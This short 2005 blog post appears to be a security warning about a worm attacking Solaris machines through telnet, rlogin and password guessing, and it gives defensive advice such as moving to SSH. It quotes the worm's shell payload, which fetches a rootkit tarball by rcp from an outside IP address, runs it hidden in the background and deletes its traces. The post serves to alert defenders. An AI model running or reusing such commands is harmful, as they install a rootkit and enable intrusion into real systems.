28-03-05

telnet worm attack against Solaris underway

using ports 25, 513  techniques telnet, rlogin and bruteforce password guessing
following the internet storm center, this is the datapackage to look out for
 
mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp
news@210.121.161.78:/usr/lib/.dl/rk/yatze-SunOS_`/usr/bin/uname -m`.tar . >mrun.sh
echo /usr/bin/tar -xvf yatze-SunOS_`/usr/bin/uname -m`.tar >>mrun.sh
echo cd rk ; /bin/sh go >>mrun.sh
echo cd / ; rm -rf /tmp/.m/* ; rm -rf /tmp/.m >>mrun.sh
/usr/bin/nohup /bin/sh mrun.sh >/dev/null 2>/dev/null &

 
if you still use telnet and rlogin, please consider upgrading to SSH(not putty please)or another secured way to protect this kind of logins
 
if you are compromised, pull your machine off the network, it can take some time before you know why they are doing this
more information about forensic methods on securingit.tk
 

01:22 Gepost door technology changes fast not a lot | Permalink | Commentaren (0) |  Facebook |

De commentaren zijn gesloten.